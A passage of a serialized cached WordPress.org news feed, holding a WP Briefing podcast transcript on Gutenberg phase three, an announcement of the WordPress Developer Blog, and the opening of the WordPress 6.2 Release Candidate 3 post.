United States. So we are actually here to talk about phase three of Gutenberg. It&#8217;s been a long time coming, and there are a lot of questions that folks have about what&#8217;s going into it and what&#8217;s not going into it.</p>\n\n\n\n<p>And as someone who works really closely with our Gutenberg technical architect, Matías Ventura, I figured you would be exactly the right person to come and talk about your favorite things. From your perspective, what is going to be the biggest enhancement that we start to approach in phase three?</p>\n\n\n\n<p>Like which thing, which API is gonna take the most work, do you think?</p>\n\n\n\n<p>[Héctor Prieto 00:01:53]<br><br>Well, the most work, that&#8217;s a very hard question to answer because we are still we are going to start an exploration phase to determine how far we want to go with each of these APIs. So, in general, all these APIs and these products are standalone projects. And some of them are shorter, and some of them are longer.</p>\n\n\n\n<p>I would say, in general, the real-time collaboration sounds the most technically challenging because of what it represents and all the changes needed to how we interact with WordPress from async to sync, basically. That would be the hardest part. I think there are also already a few prototypes working, but we need to see how that scales, for example.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:02:32]</p>\n\n\n\n<p>Yeah. So speaking of a few prototypes, I know that there are two or three different prototypes specifically for collaborative editing, but do we have people or groups, working groups in the community that have built any other prototypes? Or is it just kind of first passes at collaborative editing that we&#8217;ve seen?</p>\n\n\n\n<p>[Héctor Prieto 00:02:52]<br><br>Well, apart from Riad Benguella’s exploration, there&#8217;s a public repository with that exploration, there are a few plugins trying the same, trying real-time collaboration.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:03]<br><br>Yeah, I can think of co-blocks and as blocks, and then I feel like there was a third one.</p>\n\n\n\n<p>[Héctor Prieto 00:03:09]&nbsp;</p>\n\n\n\n<p>Yeah.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:09]<br><br>We&#8217;ll find the links to all these</p>\n\n\n\n<p>[Héctor Prieto 00:03:12]</p>\n\n\n\n<p>Yeah. Let&#8217;s add them to the show notes.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:14]<br><br>Excellent. So that&#8217;s going to be the biggest one. Is there, of the list of APIs, and this is based on the post that Matías sent out last week. If you all haven&#8217;t seen that, we&#8217;ll put that in the show notes as well. But from the APIs that Matías sort of helped us to identify last week, is there any one that you are particularly excited about for fixing things in WordPress or just generally like an interesting topic of development for you?</p>\n\n\n\n<p>[Héctor Prieto 00:03:42]<br><br>Well, I would say all of them and how they all play together. But, if I need to pick one of them…</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:48]<br><br>Everything&#8217;s the best!&nbsp;</p>\n\n\n\n<p>[Héctor Prieto 00:03:50]<br><br>I&#8217;ll cheat anyway, and I will going to pick two out of them because they solve issues at different levels. I&#8217;m very excited about visual revisions. I think it helps a lot of users, and it affects even non-technical users.</p>\n\n\n\n<p>So it&#8217;s one of the projects that lower how hard or complex WordPress can be to use sometimes. It&#8217;s going to be a huge improvement. It&#8217;s going to, I mean, bringing blocks to the revision system. I mean, it&#8217;s just a dream come true for me. I&#8217;m also going to highlight the search everywhere or quick search feature Matías already opened an issue in the GitHub repository right now.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:04:28]<br><br>Mm-hmm.</p>\n\n\n\n<p>[Héctor Prieto 00:04:28]<br><br>So the idea for this product is to have a power user shortcut that opens searching, an Alfred-like or Spotlight-like interface for those familiar with MacOS operating systems.</p>\n\n\n\n<p>When you can type anything, any place you want to go, or you want to search for any specific text in a document. And it&#8217;s supposed to be your power user command tool. So that you can do most things there.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:04:53]<br><br>Oh, and I mean not only power user command tool, but also there are some applications there for folks who have mobility issues, people who are using primarily keyboard as opposed to keyboard and mouse, all that kind of stuff, right?</p>\n\n\n\n<p>[Héctor Prieto 00:05:07]<br><br>Exactly. And just thinking long term with the rise of AI, it could be possible even to add some natural language processing to this interface so that users could just write in, in plain text, in natural language, what they want to do, and WordPress would provide the action for them.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:05:23]<br><br>Very nice. My two favorites, since you gave two favorites and I can&#8217;t just give one at that point, my two favorite projects, which are also probably really, really hard projects, are those explorations around fixing notifications. That is a really big project. And one that I think that, in general, the WordPress project is going to be really excited to have some input on.&nbsp;</p>\n\n\n\n<p>And so that&#8217;s one that I really will have an eye on. And the other one that I&#8217;m going to definitely have my eye on is the media gallery redesign. I realize that this shows, between you and I, that shows our two specific focuses. Because, of course, you work directly with guiding all of our developers. And I am very much like our user advocate. And WordPress “everyman.”</p>\n\n\n\n<p>I don&#8217;t know if that&#8217;s a term that makes sense outside the US. But I do a lot of advocacy for folks who are using WordPress from the user side as opposed to from the developer side because, of course, we have a lot of excellent developers. So y&#8217;all don&#8217;t need my help with your advocacy.</p>\n\n\n\n<p>But yeah, that really shows that you and I have different focuses, which I think is good too.</p>\n\n\n\n<p>[Héctor Prieto 00:06:32]<br><br>Yes. Also, it’s worth noting that at the end of the day, any improvement we make for developers is so that developers can build better things for users. So, at the end of the day, everything is in the best interest of the users.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:06:45]&nbsp;</p>\n\n\n\n<p>That&#8217;s right. That&#8217;s definitely a good point. Yeah. So, a final question about this particular thing because we&#8217;re trying to keep it a little brief and also because we&#8217;ll have a few other podcasts that are specifically about phase three as our explorations get going. Final question here: If you felt like there was one API or one project in particular that could benefit from a lot of community involvement which would you guess that was?</p>\n\n\n\n<p>[Héctor Prieto 00:07:20]<br><br>I don&#8217;t think I can single out any of them. I think getting user feedback is going to be a vital part of this phase, as always. So I would encourage our listeners to just participate in discussions and provide feedback as we start releasing the first prototypes in the Gutenberg plugin. I don&#8217;t think I can pick one of them for you, completely honest.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:07:43]&nbsp;</p>\n\n\n\n<p>Yeah. My guess for that is going to be the rework of the dashboard, the admin, WP admin. I think that a lot of people are gonna have a lot to say about what they use it for, what they would like to be able to use it for, how to make it look more modern, how to make it feel more modern. I think that that probably is going to benefit from a lot of early testing and possibly some specific user testing around the concepts of design in there.</p>\n\n\n\n<p>And so that&#8217;s one that that I think probably is going to take a lot of feedback from the community. And community, in this case, I think, is not only our developers and designers and copy folks who are working to build the CMS, but probably also all of our folks who are extending WordPress, everybody who is working in agencies, things like that.</p>\n\n\n\n<p>[Héctor Prieto 00:08:35]<br><br>Hmm, well, if I need to pick one, I would say the publishing flows could use also lots of feedback and testing because we are going to implement editorial requirements and customized user flows. And, of course, there are many, many different workflows out there that we might not be able to think of ourselves.</p>\n\n\n\n<p>So just imagine the sheer amount of different use cases. There&#8217;s going to be, or there currently is with customizations of third-party plugins. So, yeah. I would like to listen to how people would like the publishing flows to be. What are the specific use cases?&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:09:09]<br><br>So really, just everything, we need a lot of user feedback on everything.</p>\n\n\n\n<p>[Héctor Prieto 00:09:13]<br><br>Yes. That&#8217;s the summary.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:09:15]</p>\n\n\n\n<p>I don&#8217;t think that&#8217;s a bad summary. I know that we talk a bit about how WordPress is made better by the activity of our co-creators, the people who are using the software and testing the software, and telling us how it could be better. Those are the groups of people that make sure that we are the best version or headed in the best direction on any of our things with the software.</p>\n\n\n\n<p>And so I guess it&#8217;s probably not super unusual for everyone to hear like we need your feedback on everything because that&#8217;s probably what we do half the time.</p>\n\n\n\n<p>[Héctor Prieto 00:09:44]<br><br>Yeah, absolutely.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:09:47]<br><br>So the publishing workflows, that reminds me that there has been a little bit of a conversation lately around the naming of this phase, basically.</p>\n\n\n\n<p>And I know that the phases don&#8217;t necessarily need names. Like that&#8217;s why they&#8217;re numbered, and that&#8217;s a great idea. Like numbers are wonderful ways to reference things, but it also is just easier to reference it in kind of general conversation.</p>\n\n\n\n<p>So the first phase was easier editing, and it really focused on the editing experience itself. The second one was customization, and now the third phase has been called collaboration for quite a bit of time.</p>\n\n\n\n<p>But as we got closer and closer to this phase and we had more and more conversations that were coming out of phases one and two, it became really clear that really what we&#8217;re looking at here is more around workflows. And I love that that is an option for how to refer to this. Probably that&#8217;s how I will refer to it for most of the time that I talk about it as we are looking at phase three. </p>\n\n\n\n<p>Because I remember that when we were first building the prototypes of Gutenberg, one of the big flags that I had was that breaking changes are not just about what we can see or any sort of visual regressions or what causes the white screen of death. Also, some of the things that are breaking changes should be considered in those workflows when we change where things are or how you accomplish a task.</p>\n\n\n\n<p>And our users weren&#8217;t ready for it. That is something that is breaking for them, right?</p>\n\n\n\n<p>[Héctor Prieto 00:11:25]&nbsp;<br><br>Yes. As you mentioned, this phase was referenced as collaboration, real-time collaboration, for a long time, but if we think of how this collaboration looks, it&#8217;s much more than just editing at the same time. A very big part of collaboration is also asynchronous collaboration by adding in-line comments and improving these notifications when you have a comment in your draft. I think the power of this phase is how everything comes together. These individual pieces come together.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 0:11:51]<br><br>Yes, and I don&#8217;t know where that first flag that sparked the discussion around, like, okay, but collaborative editing is not quite big enough and also means a bunch of different things for a bunch of different people. It depends on the size of your organization or the type of content you&#8217;re writing.</p>\n\n\n\n<p>Like, I don&#8217;t know where that conversation started. My guess is, you know, some WordCamp somewhere, and an attendee was like, did you, did anybody ever think about these problems? And then they kind of worked their way around the Make Core site or otherwise made their way around to Matias&#8217;s ears.</p>\n\n\n\n<p>But yeah, I think that was a really smart choice. And you&#8217;re exactly right, collaborative editing; that can refer to the synchronous kind or the asynchronous kind, and both of those types of collaboration are equally valuable and probably equally used.</p>\n\n\n\n<p>[Héctor Prieto 00:12:40]<br><br>Yes. And one important point to note here is that this editorial flows, and this collaboration is crucial to implement multilingualism going into phase four. We need to think that as soon as we have posts and pages in different languages, there are going to be requirements in terms of how to translate these pieces of content.</p>\n\n\n\n<p>So this will need collaboration, all forms of collaboration.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:13:02]<br><br>Yeah, absolutely. This maybe was before your time with the project, but I was team multilingual-first for a long time. Or at least thinking that we could do the multilingual part of this work alongside the collaborative editing part of the work. I&#8217;ve spent a lot of time trying to understand what we think is going in phase three versus what probably we need to be able to do as far as having native multilingual support in the project.</p>\n\n\n\n<p>And I have softened my very hard position on that. You know, we&#8217;re big fans of strong positions loosely held, strong opinions loosely held. And this was one of those moments where I had that really strong opinion that we could just do them concurrently. We can do them at the same time.</p>\n\n\n\n<p>And I think it was a conversation that you and I were having when you were pointing out the complexities of translating WordPress at all, let alone being able to translate all your content as well. And it makes a lot of sense, and you&#8217;re right. I think that there are a lot of interactions, a lot of workflows that we&#8217;re gonna have to kind of refresh or redesign or rebuild before it really makes sense for us to help make that a nice streamlined option for multilingual offerings.</p>\n\n\n\n<p>[Héctor Prieto 00:14:17]<br><br>Yes, absolutely. As a Spanish-speaking person, I&#8217;m super excited about having multilingual in Core, but I also understand that we need some tooling ready before implementing multilingual in Core.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:14:29]&nbsp;</p>\n\n\n\n<p>There are no, there really are no easy problems left in WordPress, right? Like, we all agree on this now?</p>\n\n\n\n<p>[Héctor Prieto 00:14:36]<br><br>That&#8217;s correct. And we&#8217;re creating something incrementally. If we look at the phases, they are ordered sequentially. But that doesn&#8217;t mean that when we start phase three, we are, finishing phase two completely in the same way. We have not finished phase one.</p>\n\n\n\n<p>That will be like saying, when is WordPress finished, when is the development finished? So it&#8217;s an incremental project, and it&#8217;s always going to be to need refining. So it&#8217;s of course, multilingual needs to come after collaboration because we need those tools.</p>\n\n\n\n<p>But that doesn&#8217;t mean we need to finish the collaboration phase or have it very advanced phase three before we can start phase four. That will be determined in the next month as we start explorations.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:15:17]&nbsp;</p>\n\n\n\n<p>So if you all, which I know you are, are interested in better workflows, more streamlined ways of working inside WordPress, and or interested in how we are gonna get multilingual settled in the future, this is a great time to get involved in this project and in the community. Like I said, we&#8217;ve got that post up that Matías shipped last week, which, again, if you have not read it, go read it because it&#8217;s got excellent, excellent information in there for you.&nbsp;</p>\n\n\n\n<p>Héctor, before we head out, is there anything that you wanna make sure that you let the listeners know, either about phase three or just about WordPress in general?</p>\n\n\n\n<p>[Héctor Prieto 00:15:57]<br><br>Well, tomorrow is WordPress 6.2 release day. So happy 6.2, everybody!</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:16:04]<br><br>Happy 6.2. Oh, yeah. Yeah. Which means today is the dry run; probably in three hours, we&#8217;re doing the dry run.</p>\n\n\n\n<p>[Héctor Prieto 00:16:14]<br><br>Depends on when we&#8217;re listening to this, but yes.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:16:18]&nbsp;</p>\n\n\n\n<p>Oh, that&#8217;s a good point. Right? Not everybody listens to this the second it becomes available. Time zones. That&#8217;s right. Oh, man. Look at us being a global project and just pretending like everybody listens to this particular thing the moment that it&#8217;s available.</p>\n\n\n\n<p>I apologize to everybody who&#8217;s listening to it after the release or in the middle of the release party or whatever you&#8217;re doing. Regardless, tomorrow, if you&#8217;re listening to it today, is the WordPress 6.2 release, and it&#8217;s gonna be great.</p>\n\n\n\n<p>Well, Héctor, thank you so much for joining me today. I really enjoyed having you on, and thanks for letting me interview you.</p>\n\n\n\n<p>[Héctor Prieto 00:16:59]<br><br>Thank you for having me. It was my pleasure to be here.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:17:10]</p>\n\n\n\n<p>So that brings us now to our small list of big things, and as is frequently the case, it&#8217;s actually kind of a big list of big things. So we&#8217;re gonna hop right in here. As Héctor and I mentioned in the episode, the release WordPress 6.2 is coming out tomorrow, depending on when you&#8217;re listening to this. If you listen to it on the 27th, it comes out on the 28th of March.&nbsp;</p>\n\n\n\n<p>If you have a chance to drop by the release party. I would encourage you to; they&#8217;re pretty interesting just to get an idea of everything that it takes to build WordPress. It is, of course, the last few hours before a release, and so you don&#8217;t get a full scope.</p>\n\n\n\n<p>But it&#8217;s always nice to see the way that everybody in the community works together, especially there in that last moment when we&#8217;re trying to package something and test it in a bunch of environments all across the world.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:18:00]&nbsp;</p>\n\n\n\n<p>I love attending those. And so I encourage it. The next episode of the WordPress Briefing is going to have the release rundown.</p>\n\n\n\n<p>I&#8217;ll go through the key features and highlights that finally made it into 6.2. The reason we don&#8217;t do those beforehand is just in case we have to remove anything at the last minute from a release. It doesn&#8217;t happen too often, but it does happen sometimes. And so, next episode of WP Briefing, that&#8217;s what we&#8217;ll be talking about.</p>\n\n\n\n<p>The next thing on my list is a new developer blog. So there is a brand new developer blog. It was launched last Wednesday. It&#8217;s a great resource for WordPress developers to stay up to date and hear the latest in the WordPress development world. And also, we had been hearing some feedback from our developers in recent years that if you are like exploring how to extend WordPress, if you&#8217;re in that group of extenders, people who are building themes or building plugins, you&#8217;ve kind of feel like you&#8217;ve lost a place where you can have those exploratory conversations.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:19:00]&nbsp;</p>\n\n\n\n<p>This is gonna be one of those places. We&#8217;ll put a link in the show notes. So far, the content that&#8217;s planned, I think, is really interesting.</p>\n\n\n\n<p>Next thing on our small list, big list, of big things is WordCamp Europe&#8217;s Contributor Day.</p>\n\n\n\n<p>So registration for Contributor Day is now open, and it does require a separate registration than regular attendance at WordCamp Europe. So if you are registered for WordCamp Europe, you already have your ticket for that, but you are not registered for Contributor Day, click the link in the show notes and come on down to spend a little time giving back to the WordPress Project.</p>\n\n\n\n<p>And the last thing on our list today is that we have a WP20 Wapuu coloring giveaway. So put on your little party hats, and grab your crayons. The 20th anniversary Wapuu coloring giveaway is here. There is an opportunity to color in your own community-driven Wapuu and tweet it to us using #WapuuWP20 for your chance to win a sweet haul of WP20 swag items.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:20:00]</p>\n\n\n\n<p>You can check out the full rules at the link in our show notes.</p>\n\n\n\n<p>And that, my friends, is your small list of big things. Thanks for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.&nbsp;</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14697\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"Introducing the WordPress Developer Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2023/03/introducing-the-wordpress-developer-blog/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 22 Mar 2023 13:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:7:\"Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:17:\"Developer content\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=14649\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:137:\"The WordPr Developer blog, a dedicated   space to support devs, is available to help ideas sharing, ways of using new features, and more.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4661:\"\n<p>With much activity happening in the WordPress development space every day, keeping up-to-date with the latest updates can be challenging. The new <a href=\"https://developer.wordpress.org/news/\">WordPress Developer Blog</a> is a developer-focused resource to help you stay on top of the latest software features, tutorials, and learning materials relevant to the open source project.</p>\n\n\n\n<p>This blog is the culmination of a community effort that began last year. Formed by experienced WordPress community members and developers, the <a href=\"https://developer.wordpress.org/news/about/\">editorial group</a> has since worked on a wide range of content already available—from theme and block development tutorials to tips and tricks for leveraging WordPress in the site editing era.</p>\n\n\n\n<h2 class=\"wp-block-heading\">A new home for developers</h2>\n\n\n\n<p>As a complementary resource to the WordPress documentation, the Developer Blog aims to provide a shared space to stay informed of development-related updates, keep up with ongoing discussions and ideas, and explore cutting-edge use cases.</p>\n\n\n\n<p>In other words, <strong>consider it as a central hub for developers and </strong><a href=\"https://make.wordpress.org/updates/2020/05/01/care-and-influence-a-theory-about-the-wordpress-community/\"><strong>extenders</strong></a> of different backgrounds and skill levels to learn with quality content from reliable sources, share knowledge, and drive WordPress development forward.</p>\n\n\n\n<p>True to the open source way, the blog will likely evolve. As its editors and readers learn and create more content, it will adapt in response to the needs of community members like you.</p>\n\n\n\n<p>Everyone is welcome to chime in on-topic discussions, share ideas or contribute. <a href=\"https://developer.wordpress.org/news/how-to-contribute/\">Learn more about how to get involved</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\">What about the content?</h2>\n\n\n\n<p>Content on the WordPress Developer Blog covers many topics, including tutorials on <a href=\"https://developer.wordpress.org/news/category/themes/\">theme development</a>, <a href=\"https://developer.wordpress.org/news/category/plugins/\">plugins</a>, and <a href=\"https://developer.wordpress.org/news/category/block-development/\">block development</a>. You can also expect posts on WordPress APIs, best practices for working with WordPress, updates on upcoming releases, and <a href=\"https://developer.wordpress.org/news/category/learning/\">learning resources</a> for beginners and seasoned developers.</p>\n\n\n\n<p>These articles offer a good hint at what&#8217;s already in store for you:</p>\n\n\n\n<ul>\n<li><a href=\"https://developer.wordpress.org/news/2022/11/17/demystifying-home-and-posts-templates-in-wordpress-theme-development/\">Demystifying home and posts templates in WordPress theme development</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2022/11/creating-themes-from-a-pattern-first-mindset/\">Creating themes from a pattern-first mindset</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2023/02/static-vs-dynamic-blocks-whats-the-difference/\">Static vs. dynamic blocks: What’s the difference?</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2023/02/creating-custom-block-styles-in-wordpress-themes/\">Creating custom block styles in WordPress themes</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2023/03/whats-new-for-developers-march-2023/\">What’s new for developers? (March 2023)</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Sounds interesting? </h2>\n\n\n\n<p><a href=\"https://developer.wordpress.org/news/#subscribe\">Subscribe to the Developer Blog</a> to keep up with the latest content in the WordPress development space.</p>\n\n\n\n<p><em>Props for content and peer review <a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a> <a href=\'https://profiles.wordpress.org/rmartinezduque/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>rmartinezduque</a> <a href=\'https://profiles.wordpress.org/mburridge/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mburridge</a> <a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a> <a href=\'https://profiles.wordpress.org/bph/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>bph</a>&nbsp;<a href=\'https://profiles.wordpress.org/greenshady/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>greenshady</a> <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14649\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 6.2 Release Candidate 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2023/03/wordpress-6-2-release-candidate-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 21 Mar 2023 17:43:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=14685\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:315:\"WordPress 6.2 Release Candidate 3 is now available for download and testing.\nThis version of the WordPress software is under development. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC3 on a test server and site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Jonathan Pantani\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4918:\"\n<p>It’s the final countdown: the third (and last) scheduled <a href=\"https://make.wordpress.org/core/handbook/glossary/#release-candidate\">release candidate</a> (RC3) for WordPress 6.2 is ready! </p>\n\n\n\n<p>The WordPress 6.2 release is scheduled for March 28, 2023—just one week away! Now is your last opportunity to test it before the general release.&nbsp;</p>\n\n\n\n<p>Just tuning in now? Catch up on the featured highlights, and dig into more 6.2 details in the <a href=\"https://wordpress.org/news/2023/03/wordpress-6-2-release-candidate-1/\">WordPress 6.2 RC1 release announcement</a>.</p>\n\n\n\n<p>Thanks to all the Beta and RC testers who have assisted in this release. Since <a href=\"https://wordpress.org/news/2023/03/wordpress-6-2-release-candidate-2/\">RC2</a> was released on March 14, there have been about 21 issues resolved in <a href=\"https://core.trac.wordpress.org/query?status=accepted&amp;status=closed&amp;changetime=03%2F15%2F2023..03%2F21%2F2023&amp;milestone=6.2&amp;col=id&amp;col=summary&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=priority&amp;order=id\">Trac</a> and <a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.2\">GitHub</a>.</p>\n\n\n\n<p>Your feedback and help in filing bug reports keep the WordPress experience stable, smooth, and delightful. It’s critical work and a great way to contribute to the project.&nbsp;</p>\n\n\n\n<h2 class=\"wp-block-heading\">How to install RC3 for testing</h2>\n\n\n\n<p><strong>This version of the WordPress software is under development. </strong>Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC3 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.2 RC3 in three ways:</p>\n\n\n\n<p><strong>Option 1</strong>: Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2</strong>: Direct 